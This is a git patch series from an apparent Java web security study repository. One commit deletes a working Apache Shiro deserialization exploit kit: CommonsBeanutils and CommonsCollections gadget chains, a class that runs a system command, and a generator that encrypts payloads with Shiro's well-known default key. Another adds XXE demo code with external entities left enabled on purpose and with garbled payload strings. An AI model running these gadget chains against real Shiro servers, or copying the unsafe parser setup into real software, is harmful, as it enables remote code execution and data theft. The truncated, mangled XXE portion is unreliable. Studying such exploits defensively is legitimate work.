@@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client1 { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java deleted file mode 100644 index d7fcdd4..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java +++ /dev/null @@ -1,43 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import org.apache.commons.beanutils.BeanComparator; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.PriorityQueue; - -public class CommonsBeanutils1Shiro { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public byte[] getPayload(byte[] clazzBytes) throws Exception { - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); - final PriorityQueue queue = new PriorityQueue(2, comparator); - // stub data for replacement later - queue.add("1"); - queue.add("1"); - - setFieldValue(comparator, "property", "outputProperties"); - setFieldValue(queue, "queue", new Object[]{obj, obj}); - - // ================== - // 生成序列化字符串 - ByteArrayOutputStream barr = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(barr); - oos.writeObject(queue); - oos.close(); - - return barr.toByteArray(); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java deleted file mode 100644 index 7bb2cc9..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java +++ /dev/null @@ -1,55 +0,0 @@ -package com.govuln.shiroattack; - -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.ChainedTransformer; -import org.apache.commons.collections.functors.ConstantTransformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.Map; - - -public class CommonsCollections6 { - public byte[] getPayload(String command) throws Exception { - Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; - Transformer[] transformers = new Transformer[] { - new ConstantTransformer(Runtime.class), - new InvokerTransformer("getMethod", new Class[] { String.class, - Class[].class }, new Object[] { "getRuntime", - new Class[0] }), - new InvokerTransformer("invoke", new Class[] { Object.class, - Object[].class }, new Object[] { null, new Object[0] }), - new InvokerTransformer("exec", new Class[] { String.class }, - new String[] { command }), - new ConstantTransformer(1), - }; - Transformer transformerChain = new ChainedTransformer(fakeTransformers); - - // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap - Map innerMap = new HashMap(); - Map outerMap = LazyMap.decorate(innerMap, transformerChain); - - TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); - - Map expMap = new HashMap(); - expMap.put(tme, "valuevalue"); - - outerMap.remove("keykey"); - - Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); - f.setAccessible(true); - f.set(transformerChain, transformers); - - ByteArrayOutputStream barr = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(barr); - oos.writeObject(expMap); - oos.close(); - - return barr.toByteArray(); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java deleted file mode 100644 index cb0e46a..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java +++ /dev/null @@ -1,51 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.Map; - -public class CommonsCollectionsShiro { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public byte[] getPayload(byte[] clazzBytes) throws Exception { - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - Transformer transformer = new InvokerTransformer("getClass", null, null); - - Map innerMap = new HashMap(); - Map outerMap = LazyMap.decorate(innerMap, transformer); - - TiedMapEntry tme = new TiedMapEntry(outerMap, obj); - - Map expMap = new HashMap(); - expMap.put(tme, "valuevalue"); - - outerMap.clear(); - setFieldValue(transformer, "iMethodName", "newTransformer"); - - // ================== - // 生成序列化字符串 - ByteArrayOutputStream barr = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(barr); - oos.writeObject(expMap); - oos.close(); - - return barr.toByteArray(); - } -} \ No newline at end of file diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java deleted file mode 100644 index 0336572..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java +++ /dev/null @@ -1,19 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; - -public class Evil extends AbstractTranslet { - public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} - - public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} - - public Evil() throws Exception { - super(); - System.out.println("Hello TemplatesImpl"); - Runtime.getRuntime().exec("calc.exe"); - } -} \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" "b/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file From 1a57502fef90441f4328498e4315bba48c9ec479 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 10 Nov 2025 16:56:12 +0800 Subject: [PATCH 12/16] update: JNDI --- .../SSRF/.gitignore" | 38 ++++ .../SSRF/.idea/.gitignore" | 8 + .../SSRF/.idea/encodings.xml" | 7 + .../SSRF/.idea/misc.xml" | 14 ++ .../SSRF/.idea/vcs.xml" | 4 + .../SSRF/pom.xml" | 21 ++ .../SSRF/src/main/resources/springmvc.xml" | 6 + .../SSRF/src/main/webapp/WEB-INF/web.xml" | 7 + .../SSRF/src/main/webapp/index.jsp" | 5 + .../SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" | 16 ++ .../SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" | 16 ++ .../SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" | 16 ++ .../XXE/1.dtd" | 0 .../XXE/2.dtd" | 0 .../XXE/dns.xml" | 0 .../XXE/dnsoob.dtd" | 0 .../XXE/dnsoob.xml" | 0 .../XXE/oob.dtd" | 0 .../XXE/oob.xml" | 0 .../main/java/com/test/local/XXEVuln.java" | 127 ++++++++++++ .../Ser_Dser/src/main/java/deser/Main.java" | 0 .../Ser_Dser/src/main/java/pojo/Baka.java" | 62 ++++++ .../Ser_Dser/src/main/java/pojo/Student.java" | 4 + .../Ser_Dser/src/main/java/ser/Ser01.java" | 4 + README.md | 193 +++++++++++++++--- shiro/.idea/shiro.iml | 16 ++ shiro/python/.idea/python.iml | 8 + shiro/shiroDeser/BadInterceptor_within.class | Bin 0 -> 11812 bytes shiro/shiroDeser/Calc.class | Bin 0 -> 742 bytes shiro/shiroDeser/SimpleInterceptor.class | Bin 0 -> 4750 bytes shiro/shiroDeser/SpringEcho.class | Bin 0 -> 3645 bytes shiro/shiroDeser/loadClass.class | Bin 0 -> 2848 bytes shiro/shiroDeser/python/fileWrite.py | 19 ++ .../src/main/java/com/exp/ClassByteGen.java | 4 + shiro/shiroDeser/src/main/java/com/exp/L.java | 4 + .../src/main/java/com/exp/WriteFile.java | 4 + .../src/main/java/com/exp/WriteProperty.java | 4 + .../shiroDeser/src/main/java/com/exp/tmp.java | 4 + 38 files changed, 577 insertions(+), 34 deletions(-) create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" rename "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" => "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" create mode 100644 "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" create mode 100644 "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" create mode 100644 shiro/.idea/shiro.iml create mode 100644 shiro/python/.idea/python.iml create mode 100644 shiro/shiroDeser/BadInterceptor_within.class create mode 100644 shiro/shiroDeser/Calc.class create mode 100644 shiro/shiroDeser/SimpleInterceptor.class create mode 100644 shiro/shiroDeser/SpringEcho.class create mode 100644 shiro/shiroDeser/loadClass.class create mode 100644 shiro/shiroDeser/python/fileWrite.py create mode 100644 shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/L.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/WriteFile.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/tmp.java diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" new file mode 100644 index 0000000..d843f34 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" new file mode 100644 index 0000000..84992b0 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + SSRF + war + 1.0-SNAPSHOT + SSRF Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + SSRF + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" new file mode 100644 index 0000000..142def2 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" new file mode 100644 index 0000000..513ef52 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:30 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" new file mode 100644 index 0000000..148ba39 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:37 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" new file mode 100644 index 0000000..bf9ba3a --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:38 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" new file mode 100644 index 0000000..40a5cec --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" @@ -0,0 +1,127 @@ +package com.test.local; + +import org.apache.commons.digester3.Digester; +import org.dom4j.DocumentException; +import org.dom4j.io.SAXReader; +import org.jdom2.JDOMException; +import org.jdom2.input.SAXBuilder; +import org.w3c.dom.Document; +import org.w3c.dom.Node; +import org.w3c.dom.NodeList; +import org.xml.sax.InputSource; +import org.xml.sax.SAXException; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +import javax.xml.parsers.*; +import java.io.IOException; +import java.io.InputStream; +import java.io.StringReader; + +public class DocBuilder { + public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { + String xml1 = "" + + "]>" + + "" + + "&xxe;" + + "webgoat" + + ""; + + // 报错抛出数据 + String xml2 = "\n" + + "\n" + + "\n" + + "%remote;%int;%send;\n" + + "]>"; + + //DNS探测 + String xml3 = "\n" + + "\n" + + "\n" + + "%remote;\n" + + "]>"; + + // 通过CDATA,读取包含特殊符号的文本 + String xml4 = " \n" + + " \n" + + " \n" + + "\"> \n" + + " \n" + + "%dtd; ]> \n" + + "\n" + + "&all;"; + + docBuilder(xml4); + } + + public static void docBuilder(String xml) throws ParserConfigurationException, IOException, SAXException { + InputStream inputStream = new java.io.ByteArrayInputStream(xml.getBytes()); + + DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); + DocumentBuilder builder = factory.newDocumentBuilder(); + + // 漏洞:未禁用外部实体 + Document doc = builder.parse(inputStream); + + // 遍历xml节点name和value + StringBuffer buf = new StringBuffer(); + NodeList rootNodeList = doc.getChildNodes(); + for (int i = 0; i < rootNodeList.getLength(); i++) { + Node rootNode = rootNodeList.item(i); + NodeList child = rootNode.getChildNodes(); + for (int j = 0; j < child.getLength(); j++) { + Node node = child.item(j); + buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n"); + } + } + System.out.println(buf.toString()); +// System.out.println(doc); + System.out.println("Document parsed successfully"); + } + + public static void xmlReader(String xml) throws ParserConfigurationException, IOException, SAXException { + XMLReader xmlReader = XMLReaderFactory.createXMLReader(); + xmlReader.parse(new InputSource(new StringReader(xml))); + } + + public static void SAXBuilder(String xml) throws ParserConfigurationException, IOException, SAXException, JDOMException { + SAXBuilder builder = new SAXBuilder(); + // org.jdom2.Document document + builder.build(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXReader(String xml) throws DocumentException { + SAXReader reader = new SAXReader(); + // org.dom4j.Document document + reader.read(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXParser(String xml) throws ParserConfigurationException, SAXException, IOException { + SAXParserFactory spf = SAXParserFactory.newInstance(); + SAXParser parser = spf.newSAXParser(); + parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler()); + } + + public static void Digester(String xml) throws IOException, SAXException { + Digester digester = new Digester(); + Object parse = digester.parse(new StringReader(xml));// parse xml + } + + public static void docBuilderXinclude(String xml) throws ParserConfigurationException, IOException, SAXException { + DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); + dbf.setXIncludeAware(true); // 支持XInclude + dbf.setNamespaceAware(true); // 支持XInclude + DocumentBuilder db = dbf.newDocumentBuilder(); + StringReader sr = new StringReader(xml); + InputSource is = new InputSource(sr); + Document document = db.parse(is); // parse xml + + NodeList rootNodeList = document.getChildNodes(); + } + + +} diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" similarity index 100% rename from "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" rename to "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" new file mode 100644 index 0000000..63aed70 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" @@ -0,0 +1,62 @@ +package com.test.pojo; + +public class Baka extends Object{ + public String name; + protected int gender; + private int age; + + public Baka() { + System.out.println("Baka⑨"); + } + + public Baka(String name, int gender, int age) { + this.name = name; + this.gender = gender; + this.age = age; + System.out.println(name + " " + gender + " " + age); + } + + public static void sit(String name) { + System.out.println("sit " + name); + } + + public void hello(String name) { + System.out.println("hello " + name); + } + + protected void hug(String name) { + System.out.println("hug " + name); + } + + private void kiss(String name) { + System.out.println("kiss " + name); + } + + private void kiss(String alias, String name) { + System.out.println("kiss " + alias + "(" + name + ")"); + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public int getGender() { + return gender; + } + + public void setGender(int gender) { + this.gender = gender; + } + + public int getAge() { + return age; + } + + public void setAge(int age) { + this.age = age; + } +} diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" new file mode 100644 index 0000000..e8df6ba --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" @@ -0,0 +1,4 @@ +package pojo; + +public class Student { +} diff --git 